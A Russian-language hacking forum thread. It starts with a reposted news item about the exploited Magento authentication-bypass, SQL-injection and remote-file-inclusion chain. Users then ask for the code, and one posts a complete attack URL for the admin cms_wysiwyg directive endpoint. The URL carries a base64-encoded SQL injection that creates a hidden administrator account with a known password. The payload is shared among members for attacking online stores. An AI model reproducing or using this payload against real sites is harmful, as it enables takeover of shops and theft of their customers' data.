Критическая уязвимость в Magento

[krest]

Уязвимость в Magento использовалась для атак в течении 24 часов после ее разглашения

Кибермошенники пытаются взломать интернет-магазины используя недавно обнаруженную критическую уязвимость в популярной платформе Magento, владельцем которой является eBay.

Согласно заявлению специалистов из Sucuri были зафиксированы атакки с нескольких IP адресов, расположенных в России в течении 24 после того как была опубликована данная уязвимость.

Брешь в безопасности является результатом использования цепочки уязвимостей, и позволяет мошенникам удаленно выполнять произвольный РНР код на серверах. Составляющими являются уязвимости: обход аутентификации (CVE-2015-1398), SQL инъекция (CVE-2015-1397) и RFI уязвимость (CVE-2015-1399).

"В зафиксированных атаках кибермошенники использовали SQL инъекцию для создания админских учетных записей, которые в дальнейшем скорее всего, планировалось искользовать для взлома интеренет-магазинов. Мошенники создавали учетные записи vpwq или defaultmanager", сообщают специалисты из Sucuri

Также в интернете есть видео, демонстрирующее как кибермошенник может провести RCE атаку.

Ссылки:
_http://www.securityweek.com/magento-flaw-exploited-wild-within-24-hours-after-disclosure

 

[hack3core]

Это ж господа я извиняюсь пизд** Пошел как я искать код

 

[playmaker101]

hack3core, нашел код то?

 

[DarckSol]

Да, поделитесь кто найдёт

 

[hack3core]

___directive и filter base64 

site.com/index.php/admin/cms_wysiwyg/directive/?forwarded=1&___directive=e3tibG9jayB0eXBlPSdNYWdlX0FkbWluaHRtbF9CbG9ja19SZXBvcnRfU2VhcmNoX0dyaWQnIG91dHB1dD0nZ2V0Q3N2RmlsZSd9fQ==&filter=cG9wdWxhcml0eVtmcm9tXT0wJnBvcHVsYXJpdHlbdG9dPTMmcG9wdWxhcml0eVtmaWVsZF9leHByXT0wKTsgU0VUIEBTQUxUID0gJ3JwJzsgU0VUIEBQQVNTID0gQ09OQ0FUKE1ENShDT05DQVQoIEBTQUxUICwgJ3BhU1N3b3JkJykgKSwgQ09OQ0FUKCc6JywgQFNBTFQgKSk7IFNFTEVDVCBARVhUUkEgOj0gTUFYKGV4dHJhKSBGUk9NIGFkbWluX3VzZXIgV0hFUkUgZXh0cmEgSVMgTk9UIE5VTEw7IElOU0VSVCBJTlRPIGBhZG1pbl91c2VyYCAoYGZpcnN0bmFtZWAsIGBsYXN0bmFtZWAsYGVtYWlsYCxgdXNlcm5hbWVgLGBwYXNzd29yZGAsYGNyZWF0ZWRgLGBsb2dudW1gLGByZWxvYWRfYWNsX2ZsYWdgLGBpc19hY3RpdmVgLGBleHRyYWAsYHJwX3Rva2VuYCxgcnBfdG9rZW5fY3JlYXRlZF9hdGApIFZBTFVFUyAoJ0JhY2t1cCcsJ0V4dGVuc2lvbicsJ21BaWwnLCd1U2VyJyxAUEFTUyxOT1coKSwwLDAsMSxARVhUUkEsTlVMTCwgTk9XKCkpOyBJTlNFUlQgSU5UTyBgYWRtaW5fcm9sZWAgKHBhcmVudF9pZCx0cmVlX2xldmVsLHNvcnRfb3JkZXIscm9sZV90eXBlLHVzZXJfaWQscm9sZV9uYW1lKSBWQUxVRVMgKDEsMiwwLCdVJywoU0VMRUNUIHVzZXJfaWQgRlJPTSBhZG1pbl91c2VyIFdIRVJFIHVzZXJuYW1lID0gJ3VTZXInKSwnQmFja3VwJyk7